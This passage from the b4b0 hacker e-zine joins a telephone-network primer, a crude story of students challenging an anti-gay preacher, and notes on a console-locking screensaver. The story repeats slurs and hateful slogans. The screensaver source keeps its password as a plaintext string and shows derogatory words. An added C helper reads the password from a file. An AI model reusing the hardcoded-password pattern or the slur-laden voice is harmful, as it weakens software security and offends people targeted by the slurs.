usually referred to as a "pair". One wire of the pair is referred to
as the TIP and the other wire is the RING.
THE CENTRAL SWITCHING MACHINE
The CENTRAL SWITCHING MACHINE is similar to the hub of a wheel where all
the individual two wire circuits or spokes are connected. This may sound
pretty complicated, but it really isn't. The central switch monitors
your telephone circuit and gives you a dial tone when you lift the
telephone set off the cradle. Taking a telephone handset off the
cradle is referred to as going "off-hook". Off-hook is a very common
phrase, and you will hear it in later parts of this paper.
When you dial, the Central Switch registers the digits dialed,
and identifies the circuit of the party you are trying to reach. The
Central Switch then connects your two-wire circuit to the party you dialed.
The two telephone sets, which are connected together by the Central Switch,
are referred to as the "calling" and "called" parties. The Central Switch
then sends a ringing voltage out to the called party, which rings the set
bells to identify an incoming call.
When the called party goes off-hook, the Central Switch recognizes the
off-hook condition, and stops sending the ringing voltage, the two
parties then converse. When the calling party dials a number of a
telephone circuit which is already in use, or "busy", the Central
Switch recognizes the busy condition, and returns a busy tone to
the calling party.
So, as you can see, the Central Switch isn't really unfamiliar to you.
You have interacted with, and experienced many of the operations it
performs. There are many types of Central Switching Machines in use
throughout the telephone industry today. Each switch has its advantages,
and features, however all systems provide the basic functions which were
briefly described.
To review, the main parts of the Telephone Network I have described so
far are:
1. THE CENTRAL SWITCHING MACHINE
2. THE OUTSIDE PLANT FACILITIES
3. THE INSIDE PLANT FACILITIES
Let's backtrack briefly to the Outside Plant Facilities section of the
network. Obviously, it would be too difficult to take each separate
two-wire circuit, individually back to the Central Switch. Consequently,
numerous two wire circuits or pairs from a common area are bound together
in a common covering, or sheath. These groups of pairs enclosed by a common
sheath are referred to as cable. The actual number of pairs in a cable
or the size of cable can vary from one pair, to hundreds of pairs dependent
upon how many circuits the cable must service. As was mentioned previously,
all the cables servicing locations leave the Central Switch in different
directions according to the route, which will be the most cost effective,
and can effectively, service people in the area. The cables, which leave
the Central Switch, are very large, but as the cable goes along it is
continually decreasing in size, as smaller cables are dropped off at
locations where they are needed. The smaller cables branch out from the
main cables, and these cables again branch out to smaller cables until
every building and place is reached.
There are three basic types of outside plant facilities in use today, which connect the Central Switch, ultimately to your phone.
1. AERIAL CABLE
2. UNDERGROUND CABLE
3. FIBER OPTIC CABLE
Let's briefly look at each of the types of Outside Plant Facilities.
Aerial Cable
As the name aerial cable would indicate, the cable, and terminals are
supported above the ground on poles. The Aerial Cable distribution
system is probably the one you are most familiar with, since it was the
first system utilized across North America. The poles and wire are still
visible throughout this country today, and in many cases are still the
most cost-effective method, where underground cabling is physically
impossible.
The diagram would be typical of a single line residential building
application of an Aerial Outside Plant System. You may see the term
"terminal" in the diagram. Terminals are simply access points placed at
convenient locations, on or between poles, along the cable route to permit
connections to selected pairs in the cable. For example, a cable
consisting of 100 pairs might have a terminal mounted on the pole to
allow a technician access to pairs 1-25. The next terminal would allow
access to pairs 24-40, and so on, until all the pairs have been used.
In this manner, the pair assigned to each building, at the Central Switch,
can be accessed at the closest terminal to that particular building.
The individual building's aerial "drop wire" is then connected to the
pair in that terminal.
Underground Cable
The underground cable distribution system is very similar in design to the
aerial cable system. I consider underground cable to be both, DIRECT
BURIED CABLE and CABLE PLACED IN UNDERGROUND CONDUIT SYSTEMS.
As the title Direct Buried would indicate, the cable is placed into
the ground, with no protection other than the inherent protection
provided by the cable composition. Underground Conduit Systems
for cable, are used to provide an out of sight cable system and to
provide a means of adding to the existing cable as service demands
increase. Underground Conduit Systems also provide protection for
the cables since the cables are inside a pipe, which shields the cable.
The Underground Cable Distribution System is configured similarly to
the aerial cable, in that, cables leave a central point and continually
branch out to smaller cables until all the buildings etc. have been
accommodated.
The Underground System is connected to buildings in basically two ways.
PEDESTALS and ENCAPSULATION. Pedestals are simply terminals or access
points where building cabling can be connected to the cable from the
Central Switching Machine. There are many types, sizes, and shapes of
pedestals in use today.
The following diagram is a simplified depiction of the underground cable
(drop wire) from a building premise, which has been buried, to a pedestal
for connection.
Encapsulation is when the building's drop wire is permanently spliced into
the underground distribution system. This system is preferred in
situations where the visible pedestals are not appropriate, or possible.
Fiber Optic Transmission Systems
In the aerial and underground cable distribution systems looked at
earlier, a pair of copper wires is used to carry the electrical signals
generated by the transmitting building's phone, to the switching machine,
and then ultimately, to the receiver's phone. The mouthpiece (transmitter)
of the telephone converts the acoustic voice message into corresponding
electrical signals. The electrical signals are passed onto the receiver's
earpiece (receiver) where they are converted back to the original
acoustic voice message.
In certain cases now, it is becoming uneconomical to provide a pair of
wires from every customer phone to the central switch. Transmitting speech
and information via glass fibers instead of the conventional copper wire
methods previously described is becoming increasingly popular in high
traffic areas. The term "Fiber Optics" or "FOTS" is becoming more and
more prevalent in the communication industry. "FOTS" is the short term
for Fiber Optics Transmission System.
The development of FOTS technology has been increasing dramatically in
recent years. The transmitting building's phone still generates the same
electrical signals, but the signals are used to turn a light source on and
off. The light travels down the glass fibers where it is received and
converted back to electrical impulses, which are connected to the
receiving customer's two-wire copper pair.
To get a perspective of the comparison of a pair of copper wires to a pair
of glass fibers, consider the number of independent connections, which are
possible on each type of system.
* A pair of copper wires will provide two way communications for one
conversation.
* A pair of glass fibers can provide up to 8000 independent connections.
The demand for more and more facilities to transmit and receive
information is growing ever more rapidly. The cost and limitations of
traditional means of linking areas together are becoming more apparent.
The normal cable distribution systems in use throughout the telephone
industry employ combinations of underground, aerial, and FOTS
distribution systems, to provide the most cost efficient, and effective
means of providing service.
There is your basic introduction to the telephone network or system.
As my series of phone networks goes on I will go into greater detail
and explain some of its more complex issues and attributes.
Pabell
pabell@comtech.ab.ca
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
How I literally got kicked out of the Eastern Baptist Church, by schemerz
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
Disclaimer: Incidents included are all fictitious in nature due to the
shady recollection process after smoking a little bit too much hash. These
incidents were funny, at least as I remember it. These accounts are
somewhat factual, somewhat not, so I decided just to change the names and
make it safe in case I get anything horribly wrong.
Eastern Baptist Church is located in Topuka, the capital of the state
Kansas. It's not a really big church, but they get in the news a lot.
Most of the time they leave their tact at home and picket funerals and
concerts, most recently the funeral of Mathew Sheppard. (I think they
are too chicken to picket the rob zomebie and korn concert in KC last
night, kick ass concert btw, but that's another article... :) They are
also responsible for web sites such as www.goddetestsfags.com. So they
are really a fun bunch. Rush Limbough would have been proud.
Reverend Fred Felps heads the crowd, who was a lawyer in a previous life,
until one of his sons got out of the closet. Fred Felps then runs to the
nearest Warmart to purchase a really bad white robe and calls himself a
preacher. After being thrown out of the Southern Baptist Church because
of his faggot hating ways, he started his own church, the Eastern Baptist
Church, which basically runs out of his own house along with 20-30 family
members and close friends. They get supported by a lot of white power
parties too. Although not all of the family is predominantly prejudiced,
I have had the pleasure of meeting his grandson, Ben Felps, who happens to
be a graduate student doing computer science at University of Kansas. Ben
admins most of his granddaddy's sites, including of course yours truly.
Enough with the background. I have to explain why I had the urge of
seeing one of these sermons of Fred, if not fucking it up and causing some
serious mayhem:
Almost 3 years ago I arrived in Kansas fresh off the boat, as they would
say after having a less than stellar high school career somewhere in South
East Asia. Shortly after arriving into the university and being shipped
off to this smelly little dorm room, I was introduced to Sam my new
roommate. He drove me around, showing me stuff and I got to know him very
well. We were just kicking it one weekend in September and started
watching the tele, when channel 6 was doing a special of a concert held at
a local community college. Turns out this composer was dying of AIDS,
and someone was holding a concert in his name for being the talent as he
is. (I can't remember this dood's name, but I remember listening to some
of his stuff on the local university radio now. Truly a talent.) Caught
out of the corner of the camera there were these doods holding up signs with
slogans like "Anal Sex=Aids=Death," "Gay=Death of Ethics=Death of America,"
and of course, "God detests fags!". I was thoroughly bewildered at the
sight of such signs, and proceeded to bug Sam about it. Shit like this
at home just does not fly. It's not like Asians have a strong tolerance
of homosexuals or racial diversity, but they keep it to themselves and
have the politeness to withhold their opinion at times of mourning, such
as a concert displaying one's work as one dies of AIDS. Being the fuckwit
18 year old that I was, I suggested to Sam that we would head over and see
one of their sermons and check out their reasoning, because neither of us
can make any logical sense out of Fred's websites. So we called the
church up, asked if it was an open sermon coming up. We stated that we
weren't gonna cause trouble, and putting on my fakest British accent,
asked if we could attend. We were of course declined the opportunity,
since it was a closed church.
Being the dumb motherfucker Sam can be sometimes, we decided to crash the
party instead. (He's getting married to the least sensible woman on this
planet in a month, so WATCH OUT FOR DA KIDS)
So we hopped into his girlfriend's car (btw we chatted this woman up no more
than one week before, and now three years later Sam is fucking marrying
the woman... good god... time has passed QUICKLY... oh and she lent him
the car... Megan is so fucking cool, prolly cause Sam is such a fucking
pimp), and drove to Topuka. We arrived at the church shortly before the
sermon began, and walked in, saying we are looking for Ben. Ben came out
shortly, trying to cover his blood soaked ass, saying that his granddad
was holding a sermon. We talked a bit, commenting a little about the
upside down American flag hanging outside the church. He said he would
attend to us shortly after the sermon. I put on the largest puppy dog
eyes I could muster, and asked *very* politely if I can attend the
sermon. Since he was a TA in one of my computer science lab classes, he
was sure I wasn't going to pull any shit.
We got in, sat on a seat. The living room was packed, and Sam was kinda
chickening out a little... "Maybe we shouldn't be here dood..." Little did
I know he was one of the most articulate arguers I was ever gonna meet :)
So the sermon went, the usual church shit, yahdayahdayahda... the hymns,
the prayers and all that... until about 45 minutes later Sam woke me
from deep slumber when Fred started preaching the evils of homosexuality.
People started asking questions as he spoke, and he answered quite
logically. The man was a lawyer I thought, most of them, like my dad,
have a knack of conveying one side of reasoning and made it all
encompassing. So I held up my hand, to which I was asked to speak.
"Reverend Felps, I am new here, in this church and in this country. I don't
quite understand why you seem to direct all your problems at one social group
who a) pay more taxes per capita than most other minorities, b) are probably
more educated as well ?
How can any group contributing to the government and society in such a
way be considered harmful ?"
He muttered something ridiculous like telling me to get a haircut, which
was when Sam (he's got hair down to his ass... I learned never ever to
talk any shit about long hair around him) stood up and started his
rhetoric :)...
"Mr Felps, I would like to know why you are so prolific about your
projections on to gay people. It is quite entertaining, humorous even,
that you would choose to broadcast your inner id feelings towards
homosexuals on national television. "
Most people got the joke, and gave us the evilest look they could muster.
I must say most people would have backed down and shut up at this point,
but Sam, oh Sam... what can I say... Anyways, Mr Felps professed that he
did not know what Sam meant.
Sam : "Mr Felps, would you like to answer my friend's question as to why
you are targeting one of the more successful groups of minorities of this
country ?"
Felps : "I happen to think their lifestyle is a harmful influence to our
youth in this country. I also happen to perceive that this country is
being overrun by faggots. Is there no more decency in this country ?"
(applause by his crowd)
"Mr Felps, as I recall correctly, the American society is firmly
capitalist, meaning that each individual's success is based upon one's
wealth. How would the lifestyle of a homosexual, one of success, good
education and wealth be questionable to the youth? "
Felps : "As *I* recall correctly, the American society is firmly CHRISTIAN
based. It is because of non-believers such as these homosexuals, that the
youth today stem from the faith. That, is why I am opposed to them."
Me : "But was it not in the new Testament itself that states that we
should love our neighbours ?"
Felps : "Ummmmm... Are you familiar with the book of Sodom ?"
Sam : "Yes I am, and I am familiar with this line of argument. You would
state that the book of sodom states quite clearly that male-male sexual
activities are forbidden and the only male-female copulation is deemed
allowable by god. You would also state that the bible FIRMLY states that
sex is a sacred act of god, and people should not abuse this power. You
will also lead into the argument right here that AIDS and other sexually
transmitted diseases was the repercussion of these acts."
Felps : "You read my mind son. How would you choose to refute these
claims. I am of course a man bound by faith, so please keep any
arguments of the bible's validity to yourself. "
Sam : "Okay... Homosexuality has been documented long since Roman times.
How come AIDS were to come around now?"
Felps : "There are other sexually transmitted diseases that god has
dispensed in his fury upon this planet. Unfortunately the devil has made
the faggot strong in his ways, and they have not been dissuaded."
Me : "How about this ? It is nearly medically impossible for lesbians to
contract AIDS. If god indeed tried to make AIDS as a means of dissuading
homosexuality, why are a) more heterosexuals affected ? b) why did he
leave half the faggots off the list ? "
Felps : "God is not fair, he chose to punish the whole of humanity for the
crimes of the faggots. I have taken up the task of god to dissuade all of
humanity against the ways of faggots. Lesbians are evil too."
One of us : "You still have not answered the questions we posed, could you
please answer them now ? "
Felps : "I have answered them son. God has other diseases to weaken his
enemy. AIDS is only one piece in his arsenal. Gonorrhea, syphilis, etc
etc all attack sexually indecent men and women in some way or another."
One of us : "Alright fair enough, how about this... If a person who is
not sexually promiscuous, then it is very unlikely that he or she gets
infected with anything correct ? Is it possible that your god wants to
dissuade his people away from promiscuous sex ? Has he not made a
distinction between acts of love and acts of passion before ?"
Felps :"God has made it very clear that sexual acts outside of wedlock are
forbidden. "
Me :"Mr Felps, where does it exactly in the bible say that wedlock has to
between a man and a woman ?"
Felps : (stammers some unintelligible... me and sam exchange evil
grinning looks...)
Me : "As a matter of fact, where in the bible does it define the man and
the woman entity, biologically and psychologically ? If this premise is
not made, then all your arguments against homosexuality are up to
question."
Someone in the crowd : "How is that ?"
Sam : "Well it is quite easy to see that a gay couple can be enacting both
the male and female parts of the relationship. With legislation allowing
homosexuals to marry in Hawaii it is perfectly ethical for gays to be in
bounds of Christianity and still copulate. No ?"
Someone in the crowd : (something like you fags or faggot loving
liberals... something dumb like that... think it was Ben. )
Someone else in the crowd : (Leave if you don't like what we have to say,
We don't like you anyways.)
Sam : "We are merely discussing the rhetoric in the bible, I personally
made no attacks towards the validity of the good book, neither did my
friend here. "
Some bitch in the crowd : "Shut up you people are full of it as it is!"
Me : "We were merely discussing with the *beloved* reverend the various
interpretations of the bible over a fine comb."
We were asked to leave anyways :) In fact, we didn't leave quite yet
until Sam got his answers from his questions. Sorely to say we were
rather discouraged with our journey towards the interpretations of the
bible. I personally ditched the cross and became a taoist instead.
Oh well... Fred was beaten up in the middle of Kansas City one day when
he was picketing somewhere near the Plaza. HEH it was a sight to behold.
He's wrong. I am right. HAHA
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
<b4b0!b4b0!b4b0!b4b0> bsaver overview, by cp4kt <b4b0!b4b0!b4b0!b4b0>
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
This little program, based off of Qytpo's drugz2.c, has been turned into a
lovely ncurses screen saver. Nice words, derogatory words, and most
importantly, dill monkey words come up -- It's fun for the whole family.
We / I decided to just store the password in this line here.
static char passwd[] = "dillmonkey" ;
If you can code just a teeny bit, you can change this to a macro. Did I
mention teeny? We also thought that perhaps you might want to accept a
password via something prompting for a password at each session. Such
might be accomplished by:
static char passwd[20];
...
printf("Enter password to use: ");
scanf("%19s", passwd);  /* read stdin; 19 chars + NUL fit passwd[20] */
But the problem is if you forget, you might as well reboot. Also, you can
have it saved in perhaps a file .bsaver and open, fgets() from it, but
remember the character length has to be 20! You can also merely use the
passwd structure and use your login password via crypt() etc. Anyways, the
code is yours to edit. If there are any problems, mail me at
comp4ct@hotmail.com
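
The .bsaver file option mentioned above, as an added example (not code from bsaver.c or its authors): a hypothetical load_passwd() helper reads the password with fgets() into the 20-byte buffer, refusing a file that group or others can access and a line that does not fit. The helper name, the PASSWD_LEN macro and the owner-only permission rule are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

#define PASSWD_LEN 20  /* buffer size the article uses: 19 chars + NUL */

/* Hypothetical helper (not in bsaver.c). Reads the first line of `path`
 * into out[PASSWD_LEN]. Returns 0 on success, -1 if the file is missing,
 * not a regular file, accessible to group/other, empty, or too long. */
int load_passwd(const char *path, char out[PASSWD_LEN])
{
    char line[PASSWD_LEN + 1];          /* 19 chars + '\n' + NUL */
    struct stat st;
    size_t n;
    FILE *fp = fopen(path, "r");

    if (fp == NULL)
        return -1;
    /* fstat() on the open stream, so the checks apply to the file we read */
    if (fstat(fileno(fp), &st) != 0 || !S_ISREG(st.st_mode) ||
        (st.st_mode & (S_IRWXG | S_IRWXO)) != 0 ||
        fgets(line, sizeof line, fp) == NULL) {
        fclose(fp);
        return -1;
    }
    fclose(fp);

    n = strcspn(line, "\r\n");          /* length without the line ending */
    if (n == 0 || n >= PASSWD_LEN)      /* empty, or would not fit */
        return -1;
    memcpy(out, line, n);
    out[n] = '\0';
    return 0;
}

int main(int argc, char **argv)
{
    char passwd[PASSWD_LEN];

    if (argc != 2 || load_passwd(argv[1], passwd) != 0) {
        fprintf(stderr, "usage: %s FILE (mode 0600, one line, max 19 chars)\n",
                argc > 0 ? argv[0] : "loadpw");
        return 1;
    }
    printf("loaded a %lu-character password\n", (unsigned long)strlen(passwd));
    return 0;
}
```

A plaintext password in a dotfile is only as private as the file mode, which is why the helper rejects anything other than owner-only access before reading.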
p.s. don't abuse getch. Hit Enter *ONE TIME* to get a password prompt.
NOTE: If you have any minorities in your office / household, I would not
run this program in front of them. It may lock your console, but if they
see what's popping up, you could be fired / flogged. But isn't that the
b4b0 way?
Good Day,
cp4kt
Special thanks to: Matt Conover (Shok of w00w00) for his great article on
console ioctls. The macros used to lock console were taken from there.
Thank you.
-/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/-
Closing up..
WELP, THATS IT. Hope you enjoyed this totally k-sp1ff, extraordinary
diverse issue of BABO! Please send many submissions to us for B4B0 8
(submissions@b4b0.org). Comments and questions go to: letters@b4b0.org
Your editor, ph1x.
######## ######## ########
## ## ## ##
######## ## ## ########
## ## ## ##
######## ######## ##